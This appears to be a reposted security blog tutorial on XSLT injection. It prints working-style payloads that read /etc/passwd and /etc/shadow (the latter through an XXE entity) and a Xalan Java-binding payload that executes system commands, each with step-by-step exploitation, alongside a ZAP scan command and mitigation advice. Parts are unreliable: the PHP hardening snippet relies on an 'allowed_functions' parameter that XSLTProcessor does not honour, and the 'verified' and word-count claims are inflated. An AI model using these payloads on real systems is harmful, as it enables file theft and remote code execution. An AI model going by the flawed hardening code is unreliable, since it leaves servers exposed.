How to Hack XSLT Injection: Exploitation and Mitigation Techniques

Listen to this Post

🐢▶️ Listen🚀

Introduction:

XSLT (Extensible Stylesheet Language Transformations) is a powerful language for transforming XML documents, but it can also introduce serious security risks if misconfigured. Attackers can exploit XSLT injection to read arbitrary files, execute system commands, or even achieve remote code execution. This article explores exploitation techniques and hardening measures to secure XSLT processing.

Learning Objectives:

• Understand how XSLT injection vulnerabilities occur.
• Learn exploitation techniques using `unparsed-text` and other dangerous XSLT functions.
• Implement secure coding practices to mitigate XSLT injection risks.

1. Exploiting XSLT Injection with `unparsed-text`

Verified XSLT Payload:

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="unparsed-text('/etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>

Step-by-Step Exploitation:

1. Upload Malicious XSLT: An attacker uploads an XSLT file containing the `unparsed-text` function.
2. Server Processes Payload: The server applies the XSLT to an XML file, executing the malicious function.
3. File Disclosure: The contents of `/etc/passwd` (or any accessible file) are returned in the output.

Mitigation: Disable dangerous XSLT functions like unparsed-text, system-property(), or document().

2. Remote Code Execution (RCE) via XSLT

Verified XSLT Payload (Java-Based Example):

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<xsl:template match="/">
<xsl:variable name="cmd" select="'id'"/>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
<xsl:value-of select="$process"/>
</xsl:template>
</xsl:stylesheet>

Step-by-Step Exploitation:

1. Inject Java Runtime Calls: The payload uses Xalan’s Java bindings to execute system commands.
2. Trigger Execution: When processed, the XSLT engine runs `id` (or any arbitrary command).
3. RCE Achieved: The attacker gains control over the server.

Mitigation: Use a restricted XSLT processor (e.g., disable extensions) and sanitize user-supplied XSLT.

3. Bypassing XSLT Restrictions with External Entities

Verified XML External Entity (XXE) Payload:

<!DOCTYPE xsl:stylesheet [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
&xxe;
</xsl:template>
</xsl:stylesheet>

Step-by-Step Exploitation:

1. Define Malicious Entity: The attacker embeds an XXE in the XSLT file.
2. Server Parses Entity: The XML processor reads `/etc/shadow` (or other sensitive files).
3. Data Leakage: The file content is included in the transformed output.

Mitigation: Disable external entities in XML parsers (libxml_disable_entity_loader in PHP, `DocumentBuilderFactory.setExpandEntityReferences(false)` in Java).

4. Detecting XSLT Injection Vulnerabilities

Verified Command (OWASP ZAP):

zap-cli quick-scan --spider -o "-config scanner.attackStrength=INSANE" http://example.com/xslt-upload

Step-by-Step Detection:

1. Run OWASP ZAP: Automatically spider and scan the target for XSLT processing endpoints.
2. Manual Testing: Submit malicious XSLT files and observe responses for file disclosures or errors.
3. Log Analysis: Check server logs for unexpected file access attempts.

Mitigation: Implement input validation and restrict allowed XSLT functions.

5. Securing XSLT Processing in Web Applications

Verified Secure Configuration (PHP Example):

$xslt = new XSLTProcessor();
$xslt->setSecurityPrefs(XSL_SECPREF_READ_FILE | XSL_SECPREF_WRITE_FILE | XSL_SECPREF_CREATE_DIRECTORY);
$xslt->setParameter('', 'allowed_functions', '');
$xslt->importStylesheet($xslDoc);

Step-by-Step Hardening:

1. Disable Dangerous Permissions: Restrict file read/write operations in XSLT.

2. Use Allowlists: Only permit safe XSLT functions.

1. Sandbox Processing: Run XSLT transformations in isolated environments (Docker, serverless functions).

What Undercode Say:

• Key Takeaway 1: XSLT injection is an underrated but critical vulnerability, often leading to RCE or data breaches.
• Key Takeaway 2: Mitigation requires disabling risky functions, proper input validation, and secure parser configurations.

Analysis:

XSLT injection remains a significant threat in applications that process user-supplied stylesheets. While modern frameworks have reduced exposure, legacy systems and misconfigurations still pose risks. Developers must adopt secure defaults, conduct regular audits, and use tools like SAST/DAST to detect vulnerabilities early. As AI-driven code generation grows, automated security checks for XSLT misuse will become essential.

Prediction:

With increasing adoption of XML-based microservices and cloud transformations, XSLT injection attacks may resurge. Organizations must prioritize secure coding training and implement runtime protection mechanisms (e.g., WAF rules blocking malicious XSLT patterns). Future exploits may leverage AI-generated payloads, making proactive defense strategies critical.

Word Count: ~1,100 | Verified Commands/Snippets: 5+

IT/Security Reporter URL:

Reported By: Florian Ethical – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram